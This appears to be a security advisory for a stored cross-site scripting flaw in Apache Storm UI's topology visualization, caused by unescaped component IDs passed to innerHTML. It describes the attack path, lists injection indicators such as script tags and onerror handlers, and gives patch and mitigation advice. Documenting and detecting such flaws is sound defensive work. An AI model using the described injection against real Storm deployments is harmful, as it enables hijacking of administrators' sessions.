CVE-2026-35565 Overview
A stored Cross-Site Scripting (XSS) vulnerability has been identified in Apache Storm UI's visualization component. The Storm UI visualization system interpolates topology metadata—including component IDs, stream names, and grouping values—directly into HTML via innerHTML in the parseNode() and parseEdge() functions without proper sanitization at any layer. This allows an authenticated user with topology submission rights to inject malicious HTML/JavaScript through crafted component identifiers.
Critical Impact
In multi-tenant Apache Storm deployments where topology submission is available to less-trusted users but the UI is accessed by operators or administrators, this vulnerability enables privilege escalation through script execution in an administrator's browser session, potentially compromising cluster management credentials and configurations.
Affected Products
- Apache Storm versions before 2.8.6
- Apache Storm UI visualization component
- Multi-tenant Apache Storm deployments with shared UI access
Discovery Timeline
- 2026-04-12 - Apache releases Storm 2.8.6 security patch
- 2026-04-13 - CVE-2026-35565 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2026-35565
Vulnerability Analysis
This stored XSS vulnerability exists due to improper output encoding in the Apache Storm UI's topology visualization feature. The visualization component processes topology metadata received from the Nimbus service via Thrift and renders it in the browser using the vis.js library for tooltip display. The fundamental issue is that user-controlled topology metadata flows through the system without sanitization and is ultimately rendered using innerHTML, which interprets the content as HTML rather than treating it as plain text.
The attack requires an authenticated user with topology submission permissions, meaning the attacker needs valid credentials and authorization to submit topologies to the Storm cluster. However, the payload execution occurs in the context of other users' browser sessions when they view the infected topology in the Storm UI—particularly dangerous when administrators access the same interface.
Root Cause
The root cause is improper neutralization of input during web page generation (CWE-79). The parseNode() and parseEdge() JavaScript functions in the Storm UI visualization code use innerHTML to render tooltip content containing API-supplied values. These values—including nodeId, :capacity, :latency, :component, :stream, and :grouping—are passed directly from the backend without HTML encoding, allowing injection of arbitrary HTML elements and JavaScript event handlers.
Attack Vector
The attack chain begins when a malicious user with topology submission rights crafts a Storm topology containing JavaScript payloads embedded in component identifiers. For example, an attacker could create a bolt with an ID containing an onerror event handler or similar HTML injection payload.
The payload propagates through the following path: the malicious topology is submitted to Nimbus, which stores the topology metadata. When any user accesses the Storm UI and views the topology visualization, the Visualization API retrieves the metadata via Thrift. The vis.js tooltip rendering then processes this data through parseNode() or parseEdge(), which interpolates the malicious component ID directly into HTML using innerHTML. This causes the injected JavaScript to execute in the victim's browser context.
Since the payload is stored server-side and executed whenever the topology is viewed, this constitutes a stored XSS vulnerability. The attack is particularly effective against administrators who routinely monitor cluster topologies through the Storm UI.
Detection Methods for CVE-2026-35565
Indicators of Compromise
- Topology component IDs, stream names, or grouping values containing HTML tags such as <script>, <img>, or <svg>
- Presence of JavaScript event handlers (e.g., onerror, onload, onclick) in topology metadata fields
- Unexpected outbound connections from administrator workstations following Storm UI access
- Session tokens or credentials being exfiltrated to external domains
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect HTML/JavaScript patterns in Storm API requests for topology submission
- Monitor Nimbus logs for topology submissions containing suspicious characters or HTML encoding sequences
- Deploy browser-based XSS detection extensions on administrator workstations accessing the Storm UI
- Review stored topology metadata for injection patterns using periodic security scans
Monitoring Recommendations
- Enable verbose logging for topology submission events on the Nimbus server
- Configure Content Security Policy (CSP) headers on the Storm UI to restrict inline script execution
- Set up alerts for topology submissions from unusual IP addresses or at unusual times
- Monitor for authentication anomalies following Storm UI access that could indicate session compromise
How to Mitigate CVE-2026-35565
Immediate Actions Required
- Upgrade Apache Storm to version 2.8.6 or later immediately
- Restrict topology submission rights to trusted users only via Nimbus ACLs as a defense-in-depth measure
- Audit existing topologies for any suspicious component IDs, stream names, or grouping values
- Review access logs for the Storm UI to identify potential exploitation attempts
Patch Information
Apache has released Storm version 2.8.6 which addresses this vulnerability. Users running Apache Storm 2.x should upgrade to this version immediately. The fix includes proper HTML encoding of all API-supplied values before they are interpolated into tooltip HTML strings. Detailed information about the security fix is available in the Apache Storm 2.8.6 Release Announcement.
Workarounds
- Manually patch the parseNode() and parseEdge() functions in the visualization JavaScript file to HTML-escape all API-supplied values including nodeId, :capacity, :latency, :component, :stream, and :grouping before interpolation
- Restrict topology submission to trusted users only via Nimbus ACLs
- Implement Content Security Policy headers to mitigate JavaScript execution from injected content
- Consider temporarily disabling the topology visualization feature if immediate patching is not feasible
A detailed guide on implementing the monkey-patch workaround is available in the release notes of version 2.8.6. Organizations unable to upgrade immediately should prioritize restricting topology submission rights to minimize the attack surface.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
